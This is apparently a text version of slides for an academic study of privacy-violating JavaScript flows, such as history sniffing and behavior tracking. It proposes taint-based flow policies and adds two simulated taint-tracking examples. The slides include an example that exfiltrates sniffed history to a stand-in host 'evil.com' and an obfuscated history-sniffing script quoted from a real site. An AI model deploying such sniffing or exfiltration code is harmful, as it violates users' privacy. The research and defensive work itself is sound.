An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications
Dongseok Jang, Ranjit Jhala, Sorin Lerner, Hovav Shacham
UC San Diego
document.location ✗ Location Hijacking (Phishing)
document.cookie ✗ Cookie Stealing (Identity Theft)
✗ History Sniffing
JavaScript distinguishes Visited from Not-Visited links
See absolutely everything visitors do on your webpage. …
✗ Behavior Tracking
Plenty of Mischief Possible!
How Prevalent Are Malicious Flows?
How to Detect Malicious Flows?
Outline: Motivation · Flow Policies · Dynamic Flow Tracking · Flows in the Wild · Conclusions
Flow Policies
Specify different types of flows
Policies: History Sniffing
1. Create an (invisible) link to a.com; the link's color depends on the browsing history
2. Inspect the link's color style property; the color says whether the link was visited
3. Send the sniffed info over the network
Policies: History Sniffing
link = createLink("facebook.com");
style = doc.getStyle(link);
visited = style.color == "purple";
send("evil.com", "facebook=" + visited);
Policies: History Sniffing
Inject Taints (at confidential sources)
link = createLink("facebook.com");
style = doc.getStyle(link);
visited = style.color == "purple";
send("evil.com", "facebook=" + visited);
Highlighted source: doc.getStyle(link)
Policies: History Sniffing
Propagate Taints (at assignments, etc.)
link = createLink("facebook.com");
style = doc.getStyle(link);
visited = style.color == "purple";
send("evil.com", "facebook=" + visited);
Highlighted propagation: the taint on style flows through style.color == "purple" into visited, and from visited into the argument of send("evil.com", "facebook=" + visited)
Policies: History Sniffing
Block Taints (at untrusted sinks)
link = createLink("facebook.com");
style = doc.getStyle(link);
visited = style.color == "purple";
send("evil.com", "facebook=" + visited);
Highlighted sink: send("evil.com", "facebook=" + visited) is blocked (the slide also shows the variant "cr=" + color as the sent value)
Flow Policies: Inject / Block
Inject: at doc.getStyle($1) if isLink($1) inject "secret"
Taint style with "secret"
Flow Policies: Inject / Block
Block: at send($1, $2) block "secret" on $2
Block tainted values to third parties
Flow Policies: general form
Inject: at Site if Cond inject Taint
Block: at Site block Taint on Param
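The inject / propagate / block steps walked through on the history-sniffing slides and the two policy forms just stated, as an added example that is not the paper's code or its Chrome/V8 implementation: every runtime value is boxed with a set of taint labels, the two policy lines are parsed into rules, and the slides' snippet is run under them. `createLink`, `doc.getStyle`, `send`, `isLink`, the `VISITED` set and the hostnames are assumed stand-ins for the slides' pseudocode, not a browser API.

```javascript
// Added example, not code from the paper or its tool: a small model of the
// slides' inject / propagate / block discipline and of the two policy forms
//   at Site if Cond inject Taint
//   at Site block Taint on Param
// createLink, doc.getStyle, send, isLink and the hostnames are the slides'
// pseudocode, stood in for here by ordinary functions (assumed, not a browser API).

// Every runtime value is boxed: the raw value plus a set of taint labels.
const box = (v, taints = []) => ({ v, taints: new Set(taints) });

// Parse policy lines into rules. Straight quotes are used for the taint name.
function parsePolicy(lines) {
  const rules = [];
  for (const line of lines) {
    let m = line.match(/^at ([\w.]+)\(([^)]*)\)(?: if (\w+)\((\$\d)\))? inject "([^"]+)"$/);
    if (m) {
      rules.push({ kind: 'inject', site: m[1], taint: m[5],
                   cond: m[3] ? { fn: m[3], arg: Number(m[4].slice(1)) } : null });
      continue;
    }
    m = line.match(/^at ([\w.]+)\(([^)]*)\) block "([^"]+)" on \$(\d)$/);
    if (m) { rules.push({ kind: 'block', site: m[1], taint: m[3], param: Number(m[4]) }); continue; }
    throw new Error('unparseable policy line: ' + line);
  }
  return rules;
}

// Predicates a Cond clause may name.
const preds = { isLink: (b) => b.v !== null && typeof b.v === 'object' && b.v.kind === 'link' };

// Constructed browsing history for the simulation.
const VISITED = new Set(['facebook.com']);

// Wrap each policy site so that a call (1) is blocked if a blocked taint reaches
// the named parameter, (2) propagates argument taints into the result, and
// (3) injects taint when an inject rule's condition holds.
function makeEnv(rules, log) {
  const site = (name, impl) => (...args) => {
    for (const r of rules) {
      if (r.kind === 'block' && r.site === name && args[r.param - 1].taints.has(r.taint)) {
        log.push(`blocked ${name}: "${r.taint}" reaches $${r.param}`);
        return box(undefined);
      }
    }
    const out = impl(...args);
    const result = box(out.v, [...out.taints, ...args.flatMap(a => [...a.taints])]);
    for (const r of rules) {
      if (r.kind === 'inject' && r.site === name && (!r.cond || preds[r.cond.fn](args[r.cond.arg - 1]))) {
        result.taints.add(r.taint);
      }
    }
    return result;
  };
  return {
    createLink: site('createLink', (url) => box({ kind: 'link', url: url.v })),
    getStyle: site('doc.getStyle', (link) => box({ color: VISITED.has(link.v.url) ? 'purple' : 'blue' })),
    send: site('send', (host, data) => { log.push(`sent to ${host.v}: ${data.v}`); return box(true); }),
  };
}

// The slides' sniffing snippet as the rewriter would leave it: boxed values,
// with taint propagated explicitly through the field read, == and +.
function runSniffer(policyLines) {
  const log = [];
  const env = makeEnv(parsePolicy(policyLines), log);
  const link = env.createLink(box('facebook.com'));
  const style = env.getStyle(link);
  const color = box(style.v.color, style.taints);
  const visited = box(color.v === 'purple', color.taints);
  const payload = box('facebook=' + visited.v, visited.taints);
  env.send(box('evil.com'), payload);
  return { visited: visited.v, taints: [...payload.taints], log };
}

const POLICY = [
  'at doc.getStyle($1) if isLink($1) inject "secret"',
  'at send($1, $2) block "secret" on $2',
];
```

Run `runSniffer(POLICY)` and the call to `send` is blocked because `"secret"` has reached its second parameter; run `runSniffer([])` and the same snippet delivers `facebook=true`. Propagation through the field read, `==` and `+` is written out by hand here; in the paper's system it is what the AST rewriter emits for every expression.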
Flow Policies: Expressive
History Sniffing, Behavior Tracking, Cookie Stealing, Location Hijacking, …
Outline: Motivation · Flow Policies · Dynamic Flow Tracking · Flows in the Wild · Conclusions
Dynamic Flow Tracking: Rewrite JS code to carry taints
Pipeline: Source code → Parse → AST → Rewrite → AST → Execute; code produced by Dynamic Eval re-enters the pipeline
[Chander et al POPL 07]
Rewrite: add .taint fields
Pipeline: Source code → Parse → AST → Rewrite → AST → Execute; code produced by Dynamic Eval re-enters the pipeline
Rewritten code injects, propagates and blocks taints
Rewriting Issues
Pipeline: Source code → Parse → AST → Rewrite → AST → Execute; code produced by Dynamic Eval re-enters the pipeline
Boxing / Unboxing; Indirect Flows; Dynamic Eval
Dynamic Flow Tracking: Rewrite JS code to carry taints
Pipeline: Source code → Parse → AST → Rewrite → AST → Execute; code produced by Dynamic Eval re-enters the pipeline
Implemented in Chrome/V8
Dynamic Flow Tracking: Performance (Overhead)
Performance: Policies
Cookie Confidentiality: cookie doesn't flow to 3rd party code
Location Integrity: location unaffected by 3rd party code
Performance: Benchmark
10 sites with the largest JS code base in Alexa top 100
15–31 Kloc (avg. 21 Kloc)
Performance: Figures
Timing overheads: page load (avg: 2x), JS execution (avg: 3x)
Performance: Upshot
High for online use; acceptable for an offline survey
Outline: Motivation · Flow Policies · Dynamic Flow Tracking · Flows in the Wild · Conclusions
Flows “In the Wild”
History Sniffing
Behavior Tracking
History Sniffing: Figures
Alexa Top 50,000 sites
63 sites reported as sending history over network
1 site in Alexa Top 100
46 sites were real cases
History Sniffing: Example (1 site in Alexa Top 100)
var k = {0:"qpsoivc/dpn", 1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn", ...};   // encrypted URLs
var g = [];
for (var m in k) {
  var d = k[m];
  var a = "";
  for (f = 0; f < d.length; f++)                          // decrypt URL: shift each char code down by one
    a += String.fromCharCode(d.charCodeAt(f) - 1);
  var h = false;
  for (var j in { "http://": "", "http://www.": "" }) {
    var l = document.createElement("a");                  // create link
    l.href = j + a;
    document.getElementById("ol").appendChild(l);
    var e = document.getComputedStyle(l).getPropertyValue("color");   // inspect color
    if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true }
  }
  if (h) { g.push(m) }
}
Steps: Encrypted URLs → Decrypt URL → Create Link → Inspect Color
History Sniffing: Real Cases

| Rank | Site | Desc | Src | Inspected URLs |
|---|---|---|---|---|
| 61 | youporn | adult | youporn | pornhub, tube8, +21 |
| 867 | charter.net | news | interclick | cars, edmunds, +46 |
| 2333 | feedjit | traffic | feedjit | twitter, facebook, +6 |
| 2415 | gamestorrents | game | meaningtool | amazon, ebay, +220 |
| 2811 | newsmax | news | interclick | cars, edmunds, +46 |
| 3508 | namepros | forum | feedjit | twitter, facebook, +6 |
| 3603 | fulltono | music | meaningtool | amazon, ebay, +220 |
| 4266 | youporngay | adult | youporngay | pornhub, tube8, +21 |
| 4581 | osdir | tech | interclick | cars, edmunds, +46 |
| 5233 | gamesfreak | game | interclick | cars, edmunds, +46 |

+ 36 more cases…
Script inclusion chain highlighted on the slide: charter.net → doubleclick.net → interclick
Script inclusion chain highlighted on the slide: gamestorrents → harrenmedianetwork → meaningtool
History Sniffing: Upshot
# of sniffed URLs: 8 to 222
46 real cases: 39 had third-party sniffing code, 7 had home-grown code
Obfuscated sniffing code; code was generated at runtime
Malicious Flows “In the Wild”
History Hijacking
Behavior Tracking
Behavior Tracking
Log user behavior by JS event handlers
Send log back to website
Behavior Tracking: Policy
while (1) {
  e = getEvent();
  if (e.isMouseOver()) onMouseOver(e);
  if (e.isClick()) onClick(e);
  ...
}
onMouseOver = function(event) { isMouseOver = true; }
Highlighted literal: true. The handler stores a constant, so the fact that a mouseover happened reaches isMouseOver only through control flow, not through any data value
Behavior Tracking: Policy
at $1.isMouseOver() inject "secret"
at $1.isClick() inject "secret"
…
while (1) {
  e = getEvent();
  if (e.isMouseOver()) onMouseOver(e);
  if (e.isClick()) onClick(e);
  ...
}
Highlighted source: e.isMouseOver()
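The behaviour-tracking policy above injects taint at the event predicates, but the handler then assigns an untainted literal, so the secret reaches `isMouseOver` only through the branch condition. That is the Indirect Flows rewriting issue from the Rewriting Issues slide. As an added example, not the paper's code or its rewriter, the tracker below keeps a stack of "pc" taints for the enclosing conditions and folds them into every assignment made inside a branch, then blocks the send. `getEvent`, `isMouseOver`, `isClick`, `send` and the host `tracker.example` are assumed stand-ins for the slides' pseudocode.

```javascript
// Added example, not code from the paper or its tool: a model of how rewritten
// code can carry taint across an indirect (control-flow) flow, applied to the
// slides' behaviour-tracking policy. getEvent, isMouseOver, isClick and send are
// the slides' pseudocode, stood in for by ordinary functions (assumed, not a browser API).

const box = (v, taints = []) => ({ v, taints: new Set(taints) });

class Tracker {
  constructor(blockTaint) { this.blockTaint = blockTaint; this.pc = []; this.log = []; }
  // Taint implied by the conditions of all enclosing branches.
  pcTaints() { return this.pc.flatMap(s => [...s]); }
  // Rewritten `if`: the condition's taints join the pc while the branch runs.
  branch(cond, thenFn) {
    this.pc.push(cond.taints);
    try { if (cond.v) thenFn(); } finally { this.pc.pop(); }
  }
  // Rewritten assignment: the stored value carries value taint plus pc taint.
  assign(val) { return box(val.v, [...val.taints, ...this.pcTaints()]); }
  // Rewritten sink, enforcing: at send($1, $2) block "secret" on $2.
  send(host, data) {
    if (data.taints.has(this.blockTaint)) { this.log.push(`blocked send to ${host.v}`); return false; }
    this.log.push(`sent to ${host.v}: ${data.v}`);
    return true;
  }
}

// Constructed events. With the policy on, `at $1.isMouseOver() inject "secret"`
// and `at $1.isClick() inject "secret"` make those predicates return tainted booleans.
function makeEvent(type, inject) {
  const t = inject ? ['secret'] : [];
  return { isMouseOver: () => box(type === 'mouseover', t), isClick: () => box(type === 'click', t) };
}

// The slides' event loop under the rewriter. The literal `true` assigned in the
// handler is itself untainted: only the pc taint makes isMouseOver secret.
function runLoop(types, withPolicy) {
  const tr = new Tracker('secret');
  let isMouseOver = box(false);
  let clicks = box(0);
  for (const e of types.map(ty => makeEvent(ty, withPolicy))) {
    tr.branch(e.isMouseOver(), () => { isMouseOver = tr.assign(box(true)); });
    tr.branch(e.isClick(), () => { clicks = tr.assign(box(clicks.v + 1, clicks.taints)); });
  }
  const report = box(`mouseover=${isMouseOver.v};clicks=${clicks.v}`,
                     [...isMouseOver.taints, ...clicks.taints]);
  const delivered = tr.send(box('tracker.example'), report);
  return { isMouseOver: isMouseOver.v, clicks: clicks.v, taints: [...report.taints], delivered, log: tr.log };
}
```

With the policy on, `runLoop(['mouseover', 'click', 'click'], true)` builds the same report as the untracked run but the send is blocked, because both fields were assigned under a tainted condition. The model only taints assignments that actually execute inside a branch; a variable that is left untouched because the branch was not taken stays untainted, which is the usual limit of this style of dynamic pc tracking.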
Behavior Tracking: Figures
Alexa Top 1300 sites
328 sites sent behavior
115 sites sent behavior covertly
10 sampled for manual inspection
7 manually reconstructed flow
Automatically trigger JS event handlers; many flows are user-visible (image swapping)
Covert filter: response < 100 bytes
Behavior Tracking: Real Cases

| Rank | Site | Desc | Events |
|---|---|---|---|
| 3 | youtube | media | click |
| 11 | yahoo.co.jp | portal | click |
| 15 | sina.com.cn | portal | click |
| 19 | microsoft | software | click, mouseover |
| 34 | mail.ru | email | click |
| 53 | soso | search | click |
| 65 | about | search | click |
Highlighted on the slide: webtrends.com
Outline: Motivation · Flow Policies · Dynamic Flow Tracking · Flows in the Wild · Conclusions
Conclusions
Flows Occur In The Wild: real cases for further study
Dynamic Approach Is Required: obfuscated & dynamically generated code
Future work
Larger Scale Study on Flows: deeper crawl & other types of flow
Bullet-proof Protection Tool: policy enforcement without much slowdown & many false alarms
Thank you!